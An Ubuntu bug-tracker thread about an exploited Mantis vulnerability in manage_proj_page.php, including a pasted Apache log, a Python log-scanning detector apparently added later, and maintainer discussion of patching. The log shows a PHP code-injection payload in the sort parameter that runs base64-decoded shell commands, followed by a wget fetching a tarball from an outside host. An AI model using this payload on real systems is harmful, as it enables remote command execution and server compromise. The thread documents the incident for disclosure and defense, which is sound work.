security issues with manage_proj_page.php

Bug #345988 reported by Kees Cook
Affects          Status     Importance  Assigned to  Milestone
mantis (Debian)  Unknown    Unknown
mantis (Ubuntu)  Confirmed  Undecided   Unassigned

Bug Description

Binary package hint: mantis

http://secunia.com/advisories/32314/2/

Kees Cook (kees)
visibility: private → public
Kees Cook (kees)
Changed in mantis (Ubuntu):
status: New → Confirmed
Christian Schulze (lynx-quantentunnel) wrote :

This bug has been actively exploited on a hardy machine running mantis 1.0.6 on Feb 4th 2009, as it was noticed today.
Because of the LTS for hardy the vendor patch should be applied here too.

<APACHE LOG>
IP - - [04/Feb/2009:19:32:48 +0100] "GET /mantis/manage_proj_page.php HTTP/1.0" 302 - "-" "-"
IP - - [04/Feb/2009:19:32:49 +0100] "POST /mantis/login.php HTTP/1.0" 302 - "-" "-"
IP - - [04/Feb/2009:19:32:50 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die
;%23 HTTP/1.0" 200 3350 "-" "-"
IP - - [04/Feb/2009:19:32:53 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die
;%23 HTTP/1.0" 200 3218 "-" "-"
IP - - [04/Feb/2009:19:33:01 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die
;%23 HTTP/1.0" 200 3605 "-" "-"
IP - - [04/Feb/2009:19:33:19 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die
;%23 HTTP/1.0" 200 3809 "-" "-"
--19:33:01-- http://www.freewebs.com/spaniola/new.tgz
           => `new.tgz'
Resolving www.freewebs.com... 204.2.183.2
Connecting to www.freewebs.com|204.2.183.2|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 248,497 (243K) [application/x-tar]

    0K .......... .......... .......... .......... .......... 20% 58.65 KB/s
   50K .......... .......... .......... .......... .......... 41% 58.78 KB/s
  100K .......... .......... .......... .......... .......... 61% 51.43 KB/s
  150K .......... .......... .......... .......... .......... 82% 43.37 KB/s
  200K .......... .......... .......... .......... .. 100% 45.68 KB/s

19:33:07 (50.96 KB/s) - `new.tgz' saved [248497/248497]
</APACHE LOG>

The problem seems to be fixed in version 1.1.4.
Intrepid is shipping 1.1.2. Has the vendor patch been applied to that version?
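
A defender checking their own access logs for the request pattern in the excerpt above could use a check like the following. This is an added example, not part of the original comment and not Mantis code; the sample log lines are constructed (documentation IP addresses, shortened request), and the rule that a legitimate sort value is a plain column name is an assumption.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample in the shape of the excerpt above (documentation IPs).
# The third record is wrapped mid-request, as in the pasted log.
SAMPLE_LOG = r'''192.0.2.10 - - [04/Feb/2009:19:30:01 +0100] "GET /mantis/manage_proj_page.php?sort=name&dir=ASC HTTP/1.0" 200 4100 "-" "-"
198.51.100.7 - - [04/Feb/2009:19:32:49 +0100] "POST /mantis/login.php HTTP/1.0" 302 - "-" "-"
198.51.100.7 - - [04/Feb/2009:19:32:50 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);die
;%23 HTTP/1.0" 200 3350 "-" "-"
'''

RECORD_START = re.compile(r'^\S+ \S+ \S+ \[')
RECORD = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*) HTTP/[\d.]+" (?P<status>\d{3}) ')
# Assumption: a legitimate sort value is a bare column name (letters, digits, _).
SAFE_SORT = re.compile(r'\w*', re.ASCII)


def join_wrapped(text):
    """Rejoin records that a paste or mail client wrapped onto several lines."""
    records = []
    for line in text.splitlines():
        if RECORD_START.match(line) or not records:
            records.append(line)
        else:
            records[-1] += line  # continuation: no separator, the break is mid-token
    return records


def suspicious_sort_requests(text, script="manage_proj_page.php"):
    """Return (ip, timestamp, status, sort value) for non-identifier sort values."""
    hits = []
    for rec in join_wrapped(text):
        m = RECORD.match(rec)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith("/" + script):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("sort", []):
            if not SAFE_SORT.fullmatch(value):
                hits.append((m["ip"], m["ts"], int(m["status"]), value))
    return hits


if __name__ == "__main__":
    for hit in suspicious_sort_requests(SAMPLE_LOG):
        print(hit)
```

A 200 status on a flagged request, as in the excerpt, means the page was served and the host should be treated as potentially compromised rather than merely probed.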

Marc Deslauriers (mdeslaur) wrote :

Thanks for taking the time to report this bug and helping to make Ubuntu better. Since the package referred to in this bug is in universe or multiverse, it is community maintained. If you are able, I suggest posting a debdiff for this issue. When a debdiff is available, members of the security team will review it and publish the package. See the following link for more information: https://wiki.ubuntu.com/SecurityUpdateProcedures

Pete Skeggs (plskeggs) wrote : Re: [Bug 345988] Re: security issues with manage_proj_page.php

OK, sorry about the duplicate report. Unfortunately, there have been a
dozen or so different security patches in Mantis between versions 1.08
and 1.16, so while perhaps a single small patch could be produced to fix
this particular vulnerability, it would not address all the other ones.
So, would this not warrant a major version upgrade to Mantis rather than
just a patch?

-Pete

Marc Deslauriers wrote:
> Thanks for taking the time to report this bug and helping to make Ubuntu
> better. Since the package referred to in this bug is in universe or
> multiverse, it is community maintained. If you are able, I suggest
> posting a debdiff for this issue. When a debdiff is available, members
> of the security team will review it and publish the package. See the
> following link for more information:
> https://wiki.ubuntu.com/SecurityUpdateProcedures
>
> ** CVE added: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4687

Artur Rona (ari-tczew) wrote :

Duplicate of bug 481631?
